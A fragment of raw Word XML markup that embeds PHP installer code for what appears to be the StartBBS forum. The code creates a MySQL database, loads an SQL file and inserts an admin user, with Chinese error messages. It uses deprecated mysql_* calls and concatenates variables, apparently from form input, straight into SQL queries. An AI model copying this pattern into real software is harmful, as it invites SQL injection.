                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'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</w:rPr>
                    <w:t>无法连接到数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</w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>据库服务器，请检查用户名和密码是否正确</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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$this-&gt;input-&gt;post('creatdb')){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 w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50" w:firstLine="914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!@mysql_query('CREATE</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-51"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>DATABASE</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-51"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>IF</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-54"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>NOT</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-54"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>EXISTS '.$dbname)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="215" w:lineRule="exact"/>
                    <w:ind w:right="197"/>
                    <w:jc w:val="right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color w:val="333333"/>
                      <w:w w:val="95"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>die('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  <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>指</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50"/>
                    <w:rPr>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>定的数据库</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>('.$dbname.')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  <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>系统尝试创建失败，请通过其他方式建立数</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:w w:val="95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据库</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="73"/>
                    <w:ind w:right="1863"/>
                    <w:jc w:val="right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7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="1332" w:right="2322"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>!mysql_select_db($dbname,$conn)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="62"/>
        <w:ind w:left="4996" w:right="852"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>die($dbname.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="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50"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>据库不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存在，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请创建</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或检查数据名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="112"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="164"/>
        <w:ind w:left="417"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$sql =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="280" w:left="1380" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="4200" w:space="379"/>
            <w:col w:w="4021"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:left="417" w:right="1839"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>file_get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>contents(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>FCPATH.'app/config/startbbs.sql');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:left="4976" w:right="2860"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$sql =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="00292EF3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="280" w:left="1380" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="124"/>
        <w:ind w:left="417"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>str_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>replace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>"sb_",$dbprefix,$sql);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>explode(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>";",$sql);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$explode =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="280" w:left="1380" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="4512" w:space="67"/>
            <w:col w:w="4021"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="2322" w:firstLine="914"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>data[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>'msg1']="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>创建表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>".$dbname."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>成功，请稍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>……&lt;br/&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="4996" w:right="2322"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>foreach</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:left="417" w:right="2322"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>($explode as $key=&gt;$value){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="1332" w:right="2322"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>!empty($value)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="1332" w:right="2322"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>trim($value)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="124"/>
        <w:ind w:right="-34"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>mysql_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>query(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>$va</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:right="2563"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:left="1514"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:left="1514"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:left="4996" w:right="1839"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$password =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:left="417" w:right="2322"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$pwd;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="280" w:left="1380" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="1332"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>$ip=$this-&gt;myclass-&gt;get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>ip(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>"INSERT INTO "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>dbprefix."</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="176"/>
        <w:ind w:left="133"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$insert=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="280" w:left="1380" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="4824" w:space="40"/>
            <w:col w:w="3736"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="852"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s3514" style="position:absolute;left:0;text-align:left;margin-left:80.45pt;margin-top:71.85pt;width:338pt;height:572.95pt;z-index:-362944;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1609,1437" coordsize="6760,11459">
            <v:rect id="_x0000_s3778" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3777" style="position:absolute;left:1797;top:1688;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3776" style="position:absolute;left:2713;top:1688;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3775" style="position:absolute;left:3629;top:1688;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s3774" style="position:absolute" from="1612,1442" to="8366,1442" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s3773" style="position:absolute" from="1614,1440" to="1614,1951" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s3772" style="position:absolute" from="8364,1445" to="8364,1951" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s3771" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3770" style="position:absolute;left:1797;top:2014;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3769" style="position:absolute;left:2713;top:2014;width:4338;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s3768" style="position:absolute" from="1614,1951" to="1614,2277" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s3767" style="position:absolute" from="8364,1951" to="8364,2277" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s3766" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3765" style="position:absolute;left:1797;top:2310;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3764" style="position:absolute;left:2713;top:2310;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3763" style="position:absolute;left:3629;top:2310;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3762" style="position:absolute;left:4545;top:2310;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3761" style="position:absolute;left:5461;top:2310;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3760" style="position:absolute;left:6377;top:2310;width:1566;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3759" style="position:absolute;left:7943;top:2310;width:200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s3758" style="position:absolute" from="1614,2277" to="1614,2603" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s3757" style="position:absolute" from="8364,2277" to="8364,2603" strokecolor="#ccc" strokeweight=".24pt"/>
